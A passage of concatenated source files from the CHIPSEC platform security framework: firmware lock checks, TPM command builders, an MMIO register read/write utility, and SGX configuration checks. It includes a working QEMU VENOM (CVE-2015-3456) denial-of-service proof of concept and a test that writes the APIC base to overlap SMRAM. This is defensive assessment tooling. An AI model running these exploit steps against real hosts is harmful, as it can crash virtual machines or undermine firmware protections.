    ``chipsec_main -m common.bios_ts``

Examples:
    >>> chipsec_main.py -m common.bios_ts

Registers used:
    - BiosInterfaceLockDown (control)
    - TopSwapStatus (control)
    - TopSwap (control)

"""

from chipsec.library.exceptions import CSReadError
from chipsec.module_common import BaseModule, BIOS
from chipsec.library.returncode import ModuleResult
from typing import List

TAGS = [BIOS]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'COMMON', 'BIOS_TS']


class bios_ts(BaseModule):
    def __init__(self):
        BaseModule.__init__(self)

    def is_supported(self) -> bool:
        if self.cs.control.is_defined('BiosInterfaceLockDown'):
            return True
        self.logger.log_important('BiosInterfaceLockDown control not defined for platform.  Skipping module.')
        return False

    def check_bios_iface_lock(self) -> int:
        bild = self.cs.control.get('BiosInterfaceLockDown')
        self.logger.log(f'[*] BiosInterfaceLockDown (BILD) control = {bild:d}')

        if self.cs.control.is_defined('TopSwapStatus'):
            if self.cs.control.is_all_ffs('TopSwapStatus'):
                self.logger.log('[*] BIOS Top Swap mode: cannot determine status.')
                self.logger.log_verbose('TopSwapStatus read returned all 0xFs.')
            else:
                tss = self.cs.control.get('TopSwapStatus')
                self.logger.log(f"[*] BIOS Top Swap mode is {'enabled' if (1 == tss) else 'disabled'} (TSS = {tss:d})")

        if self.cs.control.is_defined('TopSwap'):
            if self.cs.control.is_all_ffs('TopSwap'):
                self.logger.log('[*] RTC Top Swap control (TS): cannot determine status.')
                self.logger.log_verbose('TopSwap read returned all 0xFs.')
            else:
                ts = self.cs.control.get('TopSwap')
                self.logger.log(f'[*] RTC TopSwap control (TS) = {ts:x}')

        if bild == 0:
            res = ModuleResult.FAILED
            self.result.setStatusBit(self.result.status.LOCKS)
            self.logger.log_failed('BIOS Interface is not locked (including Top Swap Mode)')
        else:
            res = ModuleResult.PASSED
            self.logger.log_passed('BIOS Interface is locked (including Top Swap Mode)')

        return self.result.getReturnCode(res)

    def run(self, module_argv: List[str]) -> int:
        self.logger.start_test('BIOS Interface Lock (including Top Swap Mode)')
        try:
            self.res = self.check_bios_iface_lock()
        except CSReadError as err:
            self.logger.log_warning(f'Unable to read register: {err}')
            self.result.setStatusBit(self.result.status.VERIFY)
            self.res = self.result.getReturnCode(ModuleResult.WARNING)
        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
This module checks if CPU is affected by 'The SMM memory sinkhole' vulnerability

References:
    - `Memory Sinkhole presentation by Christopher Domas <https://www.blackhat.com/docs/us-15/materials/us-15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation.pdf>`_
    - `Memory Sinkhole whitepaper <https://www.blackhat.com/docs/us-15/materials/us-15-Domas-The-Memory-Sinkhole-Unleashing-An-x86-Design-Flaw-Allowing-Universal-Privilege-Escalation-wp.pdf>`_

Usage:
    ``chipsec_main -m tools.cpu.sinkhole``

Examples:
    >>> chipsec_main.py -m tools.cpu.sinkhole

Registers used:
    - IA32_APIC_BASE.APICBase
    - IA32_SMRR_PHYSBASE.PhysBase
    - IA32_SMRR_PHYSMASK

.. note::
    - Supported OS: Windows or Linux

.. warning::
    - The system may hang when running this test.
    - In that case, the mitigation to this issue is likely working but we may not be handling the exception generated.

"""

from chipsec.module_common import BaseModule, SMM
from chipsec.library.returncode import ModuleResult

TAGS = [SMM]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'TOOLS', 'CPU', 'SINKHOLE']


class sinkhole(BaseModule):

    def __init__(self):
        BaseModule.__init__(self)

    def is_supported(self):
        if not (self.cs.os_helper.is_windows() or self.cs.os_helper.is_linux()):
            self.logger.log_important('Unsupported OS found.  Skipping module.')
            self.logger.log_important('Supported OS: Windows or Linux')
            return False
        elif not self.cs.register.is_defined('IA32_APIC_BASE') or \
                not self.cs.register.is_defined('IA32_SMRR_PHYSBASE') or \
                not self.cs.register.is_defined('IA32_SMRR_PHYSMASK'):
            self.logger.log_error("Couldn't find definition of required configuration registers.")
            return False
        else:
            return True

    def check_LAPIC_SMRR_overlap(self):
        smrr_physbase_msr = self.cs.register.read('IA32_SMRR_PHYSBASE', 0)
        apic_base_msr = self.cs.register.read('IA32_APIC_BASE', 0)
        self.cs.register.print('IA32_APIC_BASE', apic_base_msr)
        self.cs.register.print('IA32_SMRR_PHYSBASE', smrr_physbase_msr)

        smrrbase = self.cs.register.get_field('IA32_SMRR_PHYSBASE', smrr_physbase_msr, 'PhysBase')
        smrr_base = self.cs.register.get_field('IA32_SMRR_PHYSBASE', smrr_physbase_msr, 'PhysBase', True)
        apic_base = self.cs.register.get_field('IA32_APIC_BASE', apic_base_msr, 'APICBase', True)

        self.logger.log(f'[*] Local APIC Base: 0x{apic_base:016X}')
        self.logger.log(f'[*] SMRR Base      : 0x{smrr_base:016X}')

        self.logger.log('[*] Attempting to overlap Local APIC page with SMRR region')
        self.logger.log(f'   Writing 0x{smrrbase:X} to IA32_APIC_BASE[APICBase]..')
        self.logger.log_important('NOTE: The system may hang or process may crash when running this test.')
        self.logger.log('      In that case, the mitigation to this issue is likely working but we may not be handling the exception generated.')

        res = self.cs.register.write_field('IA32_APIC_BASE', 'APICBase', smrrbase, preserve_field_position=False, cpu_thread=0)

        if res is None:
            self.logger.log_important('Error encountered when attempting to modify IA32_APIC_BASE')

        apic_base_msr_new = self.cs.register.read('IA32_APIC_BASE', 0)
        self.logger.log(f'[*] New IA32_APIC_BASE: 0x{apic_base_msr_new:016X}')

        if apic_base_msr_new == apic_base_msr:
            self.logger.log_good('Could not modify IA32_APIC_BASE to overlap SMRR')
            self.logger.log_passed('CPU does not seem to have SMM memory sinkhole vulnerability')
            self.result.setStatusBit(self.result.status.SUCCESS)
            res = ModuleResult.PASSED
        else:
            self.logger.log_bad('Could modify IA32_APIC_BASE to overlap SMRR')
            self.cs.register.write('IA32_APIC_BASE', apic_base_msr, 0)
            self.logger.log(f'[*] Restored original value 0x{apic_base_msr:016X}')
            self.logger.log_failed('CPU is susceptible to SMM memory sinkhole vulnerability.  Verify that SMRR is programmed correctly.')
            self.result.setStatusBit(self.result.status.PROTECTION)
            res = ModuleResult.FAILED

        return self.result.getReturnCode(res)

    def run(self, module_argv):
        self.logger.start_test('x86 SMM Memory Sinkhole')

        if self.cs.cpu.check_SMRR_supported():
            self.logger.log_good('SMRR range protection is supported')
            self.res = self.check_LAPIC_SMRR_overlap()
        else:
            self.logger.log_important('CPU does not support SMRR range protection of SMRAM.  Skipping module.')
            self.result.setStatusBit(self.result.status.NOT_APPLICABLE)
            self.res = self.result.getReturnCode(ModuleResult.NOTAPPLICABLE)

        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2021, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

"""
>>> chipsec_util mmio list
>>> chipsec_util mmio dump <MMIO_BAR_name> [offset] [length]
>>> chipsec_util mmio dump-abs <MMIO_base_address> [offset] [length]
>>> chipsec_util mmio read <MMIO_BAR_name> <offset> <width>
>>> chipsec_util mmio read-abs <MMIO_base_address> <offset> <width>
>>> chipsec_util mmio write <MMIO_BAR_name> <offset> <width> <value>
>>> chipsec_util mmio write-abs <MMIO_base_address> <offset> <width> <value>

Examples:

>>> chipsec_util mmio list
>>> chipsec_util mmio dump MCHBAR
>>> chipsec_util mmio dump-abs 0xFE010000 0x70 0x10
>>> chipsec_util mmio read SPIBAR 0x74 0x4
>>> chipsec_util mmio read-abs 0xFE010000 0x74 0x04
>>> chipsec_util mmio write SPIBAR 0x74 0x4 0xFFFF0000
>>> chipsec_util mmio write-abs 0xFE010000 0x74 0x04 0xFFFF0000
"""

from chipsec.command import BaseCommand, toLoad
from chipsec.hal import mmio
from argparse import ArgumentParser


# ###################################################################
#
# Access to Memory Mapped PCIe Configuration Space (MMCFG)
#
# ###################################################################
class MMIOCommand(BaseCommand):

    def requirements(self) -> toLoad:
        return toLoad.All

    def parse_arguments(self) -> None:
        parser = ArgumentParser(prog='chipsec_util mmio', usage=__doc__)
        subparsers = parser.add_subparsers()

        parser_list = subparsers.add_parser('list')
        parser_list.set_defaults(func=self.list_bars)

        parser_dump = subparsers.add_parser('dump')
        parser_dump.add_argument('bar_name', type=str, help='MMIO BAR to dump')
        parser_dump.add_argument('offset', type=lambda x: int(x, 16), nargs='?', default=0,
                                 help='Offset in BAR to start dump')
        parser_dump.add_argument('length', type=lambda x: int(x, 16), nargs='?', default=None,
                                 help='Length of the region to dump')
        parser_dump.set_defaults(func=self.dump_bar)

        parser_dump_abs = subparsers.add_parser('dump-abs')
        parser_dump_abs.add_argument('base', type=lambda x: int(x, 16), help='MMIO region base address')
        parser_dump_abs.add_argument('offset', type=lambda x: int(x, 16), nargs='?', default=0,
                                     help='Offset in BAR to start dump')
        parser_dump_abs.add_argument('length', type=lambda x: int(x, 16), nargs='?', default=None,
                                     help='Length of the region to dump')
        parser_dump_abs.set_defaults(func=self.dump_bar_abs)

        parser_read = subparsers.add_parser('read')
        parser_read.add_argument('bar_name', type=str, help='MMIO BAR to read')
        parser_read.add_argument('offset', type=lambda x: int(x, 16), help='Offset value (hex)')
        parser_read.add_argument('width', type=lambda x: int(x, 16), choices=[1, 2, 4, 8],
                                 help='Width value [1, 2, 4, 8] (hex)')
        parser_read.add_argument('bus', type=lambda x: int(x, 16), nargs='?', default=None, help='bus value')
        parser_read.set_defaults(func=self.read_bar)

        parser_read_abs = subparsers.add_parser('read-abs')
        parser_read_abs.add_argument('base', type=lambda x: int(x, 16), help='MMIO region base address')
        parser_read_abs.add_argument('offset', type=lambda x: int(x, 16), help='MMIO register offset')
        parser_read_abs.add_argument('width', type=lambda x: int(x, 16), choices=[1, 2, 4, 8],
                                     help='Data width to read')
        parser_read_abs.set_defaults(func=self.read_abs)

        parser_write = subparsers.add_parser('write')
        parser_write.add_argument('bar_name', type=str, help='MMIO BAR to write')
        parser_write.add_argument('offset', type=lambda x: int(x, 16), help='Offset value (hex)')
        parser_write.add_argument('width', type=lambda x: int(x, 16), choices=[1, 2, 4, 8],
                                  help='Width value [1, 2, 4, 8] (hex)')
        parser_write.add_argument('value', type=lambda x: int(x, 16), help='Value to write (hex)')
        parser_write.add_argument('bus', type=lambda x: int(x, 16), nargs='?', default=None, help='bus value')
        parser_write.set_defaults(func=self.write_bar)

        parser_write_abs = subparsers.add_parser('write-abs')
        parser_write_abs.add_argument('base', type=lambda x: int(x, 16), help='MMIO region base address')
        parser_write_abs.add_argument('offset', type=lambda x: int(x, 16), help='MMIO register offset')
        parser_write_abs.add_argument('width', type=lambda x: int(x, 16), choices=[1, 2, 4, 8],
                                      help='Data width to read')
        parser_write_abs.add_argument('value', type=lambda x: int(x, 16), help='Value to write (hex)')
        parser_write_abs.set_defaults(func=self.write_abs)

        parser.parse_args(self.argv, namespace=self)

    def set_up(self) -> None:
        self._mmio = mmio.MMIO(self.cs)

    def list_bars(self):
        self._mmio.list_MMIO_BARs()

    def dump_bar(self):
        self.logger.log("[CHIPSEC] Dumping {} MMIO space..".format(self.bar_name.upper()))
        (bar_base, bar_size) = self._mmio.get_MMIO_BAR_base_address(self.bar_name.upper())
        if self.length is not None:
            bar_size = self.length
        else:
            bar_size -= self.offset
        bar_base += self.offset
        self._mmio.dump_MMIO(bar_base, bar_size)

    def dump_bar_abs(self):
        tmp_base = self.base + self.offset
        if self.length is None:
            tmp_length = 0x1000
        else:
            tmp_length = self.length
        self.logger.log("[CHIPSEC] Dumping MMIO space 0x{:08X} to 0x{:08X}".format(tmp_base, tmp_base + tmp_length))
        self._mmio.dump_MMIO(tmp_base, tmp_length)

    def read_bar(self):
        bar = self.bar_name.upper()
        reg = self._mmio.read_MMIO_BAR_reg(bar, self.offset, self.width, self.bus)
        self.logger.log("[CHIPSEC] Read {} + 0x{:X}: 0x{:08X}".format(bar, self.offset, reg))

    def read_abs(self):
        if self.width == 1:
            reg = self._mmio.read_MMIO_reg_byte(self.base, self.offset)
        elif self.width == 2:
            reg = self._mmio.read_MMIO_reg_word(self.base, self.offset)
        elif self.width == 4:
            reg = self._mmio.read_MMIO_reg_dword(self.base, self.offset)
        elif self.width == 8:
            reg = self._mmio.read_MMIO_reg_dword(self.base, self.offset)
            reg |= self._mmio.read_MMIO_reg_dword(self.base, self.offset + 4) << 32
        self.logger.log("[CHIPSEC] Read 0x{:X} + 0x{:X}: 0x{:08X}".format(self.base, self.offset, reg))

    def write_bar(self):
        bar = self.bar_name.upper()
        self.logger.log("[CHIPSEC] Write {} + 0x{:X}: 0x{:08X}".format(bar, self.offset, self.value))
        self._mmio.write_MMIO_BAR_reg(bar, self.offset, self.value, self.width, self.bus)

    def write_abs(self):
        self.logger.log("[CHIPSEC] Write 0x{:X} + 0x{:X}: 0x{:08X}".format(self.base, self.offset, self.value))
        if self.width == 1:
            self._mmio.write_MMIO_reg_byte(self.base, self.offset, self.value & 0xFF)
        elif self.width == 2:
            self._mmio.write_MMIO_reg_word(self.base, self.offset, self.value & 0xFFFF)
        elif self.width == 4:
            self._mmio.write_MMIO_reg_dword(self.base, self.offset, self.value & 0xFFFFFFFF)
        elif self.width == 8:
            self._mmio.write_MMIO_reg_dword(self.base, self.offset, self.value & 0xFFFFFFFF)
            self._mmio.write_MMIO_reg_dword(self.base, self.offset + 4, (self.value >> 32) & 0xFFFFFFFF)


commands = {'mmio': MMIOCommand}



# CHIPSEC: Platform Security Assessment Framework
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
#

import unittest

from unittest.mock import MagicMock
from chipsec.hal.acpi_tables import RSDP
from chipsec.hal.acpi import ACPI


class TestACPI(unittest.TestCase):
    def test_apci_read_rsdp(self):
        mock_cs = MagicMock()
        rsdp_buf = b'RSD PTR \x93INTEL\x00\x02(\xd0^z'
        rsdp_buf_ext = b'RSD PTR \x93INTEL\x00\x02(\xd0^z$\x00\x00\x00\xc0\xd0^z\x00\x00\x00\x00t\x00\x00\x00'
        mock_cs.mem.read_physical_mem.side_effect = [rsdp_buf, rsdp_buf_ext]
        pa = 983056
        test_acpi = ACPI(mock_cs)
        self.assertIsInstance(test_acpi.read_RSDP(pa), RSDP)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
Definition for TPMv1.2 commands to use with TPM HAL

TCG PC Client TPM Specification
TCG TPM v1.2 Specification
"""

import struct
from typing import Tuple
from collections import namedtuple
from chipsec.library.logger import logger
from chipsec.library.tpm import tpm_defines


class TPM_RESPONSE_HEADER(namedtuple('TPM_RESPONSE_HEADER', 'ResponseTag DataSize ReturnCode')):
    __slots__ = ()
    def __str__(self) -> str:
        _str = f"""----------------------------------------------------------------
                     TPM response header
----------------------------------------------------------------
   Response TAG: 0x{self.ResponseTag:x}
   Data Size   : 0x{self.DataSize:x}
   Return Code : 0x{self.ReturnCode:x}
"""
        _str += "\t"
        try:
            _str += tpm_defines.STATUS[self.ReturnCode]
        except:
            _str += "Invalid return code"
        _str += "\n"
        return _str
    

def pcrread(*command_argv: str) -> Tuple[bytes, int]:
    """
    The TPM_PCRRead operation provides non-cryptographic reporting  of the contents of a named PCR
    """
    Size = 0x0E000000
    try:
        Pcr = tpm_defines.PCR[int(command_argv[0])]
    except:
        if logger().HAL:
            logger().log_bad("Invalid PCR value\n")
        return (b'', 0)
    command = struct.pack(tpm_defines.COMMAND_FORMAT, tpm_defines.TPM_TAG_RQU_COMMAND, Size, tpm_defines.TPM_ORD_PCRREAD, Pcr, 0, 0)
    size = Size >> 0x18
    return (command, size)


def nvread(*command_argv: str) -> Tuple[bytes, int]:
    """
    Read a value from the NV store
    Index, Offset, Size
    """
    Size = 0x18000000
    command = struct.pack(tpm_defines.COMMAND_FORMAT, tpm_defines.TPM_TAG_RQU_COMMAND, Size, tpm_defines.TPM_ORD_NV_READVALUE, int(command_argv[0], 16), int(command_argv[1], 16), int(command_argv[2], 16))
    size = Size >> 0x18
    return (command, size)


def startup(*command_argv: str) -> Tuple[bytes, int]:
    """
    Execute a tpm_startup command. TPM_Startup is always preceded by TPM_Init, which is the physical indication (a system wide reset) that TPM initialization is necessary
    Type of Startup to be used:
    1: TPM_ST_CLEAR
    2: TPM_ST_STATE
    3: TPM_ST_DEACTIVATED
    """
    try:
        startupType = tpm_defines.STARTUP[int(command_argv[0])]
    except:
        if logger().HAL:
            logger().log_bad("Invalid startup type option value\n")
        return (b'', 0)
    Size = 0x0E000000
    command = struct.pack(tpm_defines.COMMAND_FORMAT, tpm_defines.TPM_TAG_RQU_COMMAND, Size, tpm_defines.TPM_ORD_STARTUP, startupType, 0, 0)
    size = Size >> 0x18
    return (command, size)


def continueselftest(*command_argv: str) -> Tuple[bytes, int]:
    """
    TPM_ContinueSelfTest informs the TPM that it should complete self-test of all TPM functions. The TPM may return success immediately and then perform the self-test, or it may perform the self-test and then return success or failure.
    """
    Size = 0x0A000000
    command = struct.pack(tpm_defines.COMMAND_FORMAT, tpm_defines.TPM_TAG_RQU_COMMAND, Size, tpm_defines.TPM_ORD_CONTINUESELFTEST, 0, 0, 0)
    size = Size >> 0x18
    return (command, size)


def getcap(*command_argv: str) -> Tuple[bytes, int]:
    """
    Returns current information regarding the TPM
    CapArea    - Capabilities Area
    SubCapSize - Size of SubCapabilities
    SubCap     - Subcapabilities
    """
    Size = 0x18000000
    command = struct.pack(tpm_defines.COMMAND_FORMAT, tpm_defines.TPM_TAG_RQU_COMMAND, Size, tpm_defines.TPM_ORD_GETCAPABILITY, int(command_argv[0], 16), int(command_argv[1], 16), int(command_argv[2], 16))
    size = Size >> 0x18
    return (command, size)


def forceclear(*command_argv: str) -> Tuple[bytes, int]:
    Size = 0x0A000000
    command = struct.pack(tpm_defines.COMMAND_FORMAT, tpm_defines.TPM_TAG_RQU_COMMAND, Size, tpm_defines.TPM_ORD_FORCECLEAR, 0, 0, 0)
    size = Size >> 0x18
    return (command, size)



#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2021, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
#Contact information:
#chipsec@intel.com
#

import os

doc_path = os.getcwd()
src_path = os.path.abspath(os.path.join(doc_path, '..', '..'))

# Get current version for manual
def getVersion():
    ver_path = os.path.join(src_path, 'chipsec', 'VERSION')
    scover_path = os.path.join(doc_path, '_templates','scover.tmpl')
    index_path = os.path.join(doc_path, 'index.rst')

    with open(os.path.join(ver_path), 'r') as f:
        version = f.read()
    
    with open(os.path.join(scover_path), 'r') as f:
        contents = f.read()
    splitContents = contents.split('\n')
    contents = contents.replace(splitContents[8], 'version ' + version)
    with open(os.path.join(scover_path), 'w') as f:
        f.write(contents)

    with open(os.path.join(index_path), 'r') as f:
        contents = f.read()
    splitContents = contents.split('\n')
    withVer = 'CHIPSEC ' + version
    contents = contents.replace(splitContents[5], withVer, 2)
    contents = contents.replace(splitContents[6], '=' * len(withVer), 1)
    with open(os.path.join(index_path), 'w') as f:
        f.write(contents)

if __name__ == "__main__":
    getVersion()


# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
QEMU VENOM vulnerability DoS PoC test

Reference:
    - Module is based on `PoC by Marcus Meissner <https://marc.info/?l=oss-security&m=143155206320935&w=2>`_
    - `VENOM: QEMU vulnerability (CVE-2015-3456) <https://access.redhat.com/articles/1444903>`_

Usage:
    ``chipsec_main.py -i -m tools.vmm.venom``

Examples:
    >>> chipsec_main.py -i -m tools.vmm.venom

Additional options set within the module:
    - ``ITER_COUNT``         : Iteration count
    - ``FDC_PORT_DATA_FIFO`` : FDC DATA FIFO port
    - ``FDC_CMD_WRVAL``      : FDC Command write value
    - ``FD_CMD``             : FD Command

.. note::
    - Returns a Warning by default
    - System may be in an unknown state, further evaluation may be needed

.. important::
    - This module is designed to run in a VM environment
    - Behavior on physical HW is undefined

"""

from chipsec.module_common import BaseModule
from chipsec.library.returncode import ModuleResult

_MODULE_NAME = 'venom'

ITER_COUNT = 0x10000000
FDC_PORT_DATA_FIFO = 0x3F5
FDC_CMD_WRVAL = 0x42
FD_CMD = 0x8E  # FD_CMD_DRIVE_SPECIFICATION_COMMAND # FD_CMD_READ_ID = 0x0A


class venom (BaseModule):
    def __init__(self):
        BaseModule.__init__(self)

    def venom_impl(self):
        self.cs.io.write_port_byte(FDC_PORT_DATA_FIFO, FD_CMD)
        for _ in range(ITER_COUNT):
            self.cs.io.write_port_byte(FDC_PORT_DATA_FIFO, FDC_CMD_WRVAL)
        return True

    def run(self, module_argv):
        self.logger.start_test('QEMU VENOM vulnerability DoS PoC')

        self.venom_impl()

        self.logger.log_information('Module completed')
        self.logger.log_warning('System may be in an unknown state, further evaluation may be needed.')
        self.result.setStatusBit(self.result.status.VERIFY)
        self.res = self.result.getReturnCode(ModuleResult.WARNING)
        return self.res



#!/usr/bin/python
# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2020, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

# This file incorporates work covered by the following copyright and permission notice


## @file
# package and install PyEfiCompressor extension
#
#  Copyright (c) 2008, Intel Corporation. All rights reserved.<BR>
#
#  SPDX-License-Identifier: BSD-2-Clause-Patent
#

##
# Import Modules
#
from os import path
from setuptools import setup, Extension

setup(
    name="EfiCompressor",
    version="0.02",
    ext_modules=[
        Extension(
            'EfiCompressor',
            sources=[
                'Bra86.c',
                'Decompress.c',
                'Compress.c',
                'EfiCompress.c',
                'TianoCompress.c',
                'EfiCompressor.c'
            ],
            include_dirs=[
                'Include',
                path.join('Include', 'Common'),
                path.join('Include', 'X64'),
            ],
        )
    ],
)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2022, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#
# Authors:
#  Sushmith Hiremath, INTEL DCG RED team
#

"""
Check SGX related configuration

Reference:
    - SGX BWG, CDI/IBP#: 565432

Usage:
    ``chipsec_main -m common.sgx_check``

Examples:
    >>> chipsec_main.py -m common.sgx_check

Registers used:
    - IA32_FEATURE_CONTROL.SGX_GLOBAL_EN
    - IA32_FEATURE_CONTROL.LOCK
    - IA32_DEBUG_INTERFACE.ENABLE
    - IA32_DEBUG_INTERFACE.LOCK
    - MTRRCAP.PRMRR
    - PRMRR_VALID_CONFIG
    - PRMRR_PHYBASE.PRMRR_base_address_fields
    - PRMRR_PHYBASE.PRMRR_MEMTYPE
    - PRMRR_MASK.PRMRR_mask_bits
    - PRMRR_MASK.PRMRR_VLD
    - PRMRR_MASK.PRMRR_LOCK
    - PRMRR_UNCORE_PHYBASE.PRMRR_base_address_fields
    - PRMRR_UNCORE_MASK.PRMRR_mask_bits
    - PRMRR_UNCORE_MASK.PRMRR_VLD
    - PRMRR_UNCORE_MASK.PRMRR_LOCK
    - BIOS_SE_SVN.PFAT_SE_SVN
    - BIOS_SE_SVN.ANC_SE_SVN
    - BIOS_SE_SVN.SCLEAN_SE_SVN
    - BIOS_SE_SVN.SINIT_SE_SVN
    - BIOS_SE_SVN_STATUS.LOCK
    - SGX_DEBUG_MODE.SGX_DEBUG_MODE_STATUS_BIT

.. note::
    - Will not run within the EFI Shell

"""

from typing import Tuple
from chipsec.library.exceptions import HWAccessViolationError
from chipsec.module_common import BaseModule, HWCONFIG
from chipsec.library.returncode import ModuleResult
from chipsec.library.defines import BIT0, BIT1, BIT2, BIT5, BIT6, BIT7, BIT8
from chipsec.modules.common.sgx_check_sidekick import SGX_Check_Sidekick

TAGS = [HWCONFIG]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'COMMON', 'SGX_CHECK']


class sgx_check(BaseModule):
    def __init__(self):
        BaseModule.__init__(self)
        self.helper = self.cs.helper
        self.res = ModuleResult.PASSED

    def is_supported(self) -> bool:
        sgx_cpu_support = False
        if self.cs.os_helper.is_efi():
            self.logger.log_important('Currently this module cannot run within the EFI Shell. Exiting.')
        elif not self.cs.register.has_field('IA32_FEATURE_CONTROL', 'SGX_GLOBAL_EN'):
            self.logger.log_important('IA32_FEATURE_CONTROL.SGX_GLOBAL_EN not defined for platform.  Skipping module.')
        else:
            for tid in range(self.cs.msr.get_cpu_thread_count()):
                status = self.helper.set_affinity(tid)
                if status == -1:
                    self.logger.log_verbose(f'[*] Failed to set affinity to CPU{tid:d}')
                (_, r_ebx, _, _) = self.cs.cpu.cpuid(0x07, 0x00)
                if r_ebx & BIT2:
                    self.logger.log_verbose(f'[*] CPU{tid:d}: does support SGX')
                    sgx_cpu_support = True
                else:
                    self.logger.log_verbose(f'[*]CPU{tid:d}: does not support SGX')
                    self.logger.log_important('SGX not supported.  Skipping module.')

        return sgx_cpu_support

    def check_sgx_config(self) -> int:
        self.logger.log('[*] Test if CPU has support for SGX')
        sgx_ok = False

        self.logger.log('\n[*] SGX BIOS enablement check')
        self.logger.log('[*] Verifying IA32_FEATURE_CONTROL MSR is configured')
        bios_feature_control_enable = True
        for tid in range(self.cs.msr.get_cpu_thread_count()):
            if not (self.cs.register.read_field('IA32_FEATURE_CONTROL', 'SGX_GLOBAL_EN', False, tid) == 1):
                bios_feature_control_enable = False
        if bios_feature_control_enable:
            self.logger.log_good('Intel SGX is Enabled in BIOS')
        else:
            self.logger.log_important('Intel SGX is not enabled in BIOS')
            self.res = ModuleResult.WARNING
            self.result.setStatusBit(self.result.status.FEATURE_DISABLED)

        self.logger.log('\n[*] Verifying IA32_FEATURE_CONTROL MSR is locked')
        locked = True
        for tid in range(self.cs.msr.get_cpu_thread_count()):
            feature_cntl_lock = self.cs.control.get('Ia32FeatureControlLock', tid)
            self.logger.log_verbose(f'[*] cpu{tid:d}: IA32_Feature_Control Lock = {feature_cntl_lock:d}')
            if 0 == feature_cntl_lock:
                locked = False
        if locked:
            self.logger.log_good('IA32_Feature_Control locked')
        else:
            self.logger.log_bad('IA32_Feature_Control is unlocked')
            self.res = ModuleResult.FAILED
            self.result.setStatusBit(self.result.status.LOCKS)

        self.logger.log('\n[*] Verifying if Protected Memory Range (PRMRR) is configured')
